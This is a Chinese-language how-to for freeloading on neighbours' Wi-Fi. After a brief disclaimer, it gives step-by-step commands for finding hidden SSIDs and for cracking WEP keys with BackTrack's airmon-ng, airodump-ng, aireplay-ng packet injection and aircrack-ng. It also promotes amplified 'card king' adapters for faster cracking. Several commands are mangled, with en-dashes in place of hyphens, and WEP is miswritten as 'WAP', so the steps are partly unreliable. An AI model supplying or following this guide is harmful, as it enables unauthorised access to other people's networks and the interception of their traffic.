現在都想著撈便宜蹭網嘛,但首先聲明,窮人沒錢上網可以想辦法曲折上網,但不能蹭別人網幹壞事,這是道義、法律所不允許的。
破解無線路由的關鍵你要有無限網卡、周圍有無線網路
首先搜尋無限網路,能搜到不加密的網路那最好了,那一下你就不必往下看了。如果你找到了但是加密的,請往下看,但現在要討論另一種情況,那就是找不到無線網路。
找不到無線網路,二個可能,一、真的沒有無線網路,二、無線網路被隱藏了。
要找出被隱藏的無線網路,首先要準備好一個軟體netstumbler。為什麼被隱藏了呢,因為無線路由器禁止了SSID廣播,所以用netstumbler這個軟體進行搜尋,如果確實有無限網路的話就會被掃描出來,並標示“偽裝”,這是你接下這個無線SSID名字,現在假設為WUXIAN
現在一般的筆記本都用的迅馳模組進行無線上網,那現在開啟管理程式intel PROSet Wireless,單擊“啟動因特爾PROSet”然後搜尋周圍無線網路,會發現一個隱藏的無線網路,並顯示“SSID未廣播”
選中這個“SSID未廣播”的無線網路,單擊“配置”,在“配置式名稱”中隨意填一個名稱,在“無線網路的名稱SSID”輸入之前找到的“WUXIAN”,然後下一步完成,如果是沒有加密的現在就可以連結蹭網了。
最主要的開始了,首先準備一個軟體BT——BackTrack(一下都稱為BT),可以從官網上下載,一共有三個版本(光碟片版、隨身碟版、虛擬機器版),用哪一個看你自己了;一個可以被BT識別的網卡(卡王、卡皇、神卡)
這裡介紹用光碟片版BT
第一步、用光碟片BT啟動電腦,在啟動過程中會要求輸入密碼,一般使用者名稱“root”密碼“toor”,如果不是你可以看看下載的地方有沒有說明,啟動完畢,是命令列形式的,輸入“startx”,斷行符號,進入圖形介面。
第二步、需要查看無線網卡是否被BT支援。在工作列中開啟名叫“konsole”,開啟命令列視窗,輸入“ifconfig -a”,看是否無線網卡被支援。
第三步、啟動無線網卡。在命令視窗中輸入“ifconfig eth1 up”“ifconfig rtap0 up”
啟用網卡監聽模式。輸入“airmon –ng start eth1”
輸入抓包命令。輸入“airodump –ng –ivs –w name –c 2 eth1”
這樣我們就能知道要破解的AP的essid、mac地址和與之相連的用戶端的MAC。
使用不是IPW2200網卡的,可以跳過第四步
第四步、打IPW2200注入補丁。之前的一個命令列視窗不要關閉,重新再開一個命令列視窗,輸入“modprobe ipw2200 rtap_iface=1”“iwconfig eth1 ap <MAC>”這裡的MAC是我們上一步所查到的MAC,把查到的幾個MAC輸進去,MAC和MAC之間要用“:”連結,接下來在輸入“iwconfig eth1 key s:fakekey”“iwconfig eth1 mode managed”,這裡的IPW2200注入補丁完了。
第五步、進行注入。輸入“aireplay –ng -3 –b 'ap的mac’ –h '用戶端網卡的mac’ eth1”,這裡的單引號不用輸入,ap的mac就是第三步中所查到的mac,用戶端mac就是第三步所查到的與ap相連的用戶端mac
這一步可能需要一點時間,所以輸入完請耐性等待,可能時間會較長,不要以為死機而關了。
第六步、進行破解。觀看第五步中的注入,等到資料增加過萬後,開啟另一個命令列視窗,輸入“aircrack –ng –n 64 name -01.ivs”斷行符號確定後,會先詢問要破解哪個無線網路,輸入ivs值最大的那行序號就可以了,斷行符號就開始破解了,等待一段時間密碼就破解顯示出來了,接下來該幹嘛我不用多說了吧……
這裡小小的介紹下,卡王、卡皇、卡神,是什麼個東西。
這三個東西其實都是經過改裝的USB無限網卡,主要是在網卡中加入功率放大模組,因為能更有效更快速的破解WAP密碼。
卡王是最早出現的改裝網卡,卡皇是卡王的升級版功能更強大,而卡神能完美的支援BT、支援注入攻擊,破解更迅速。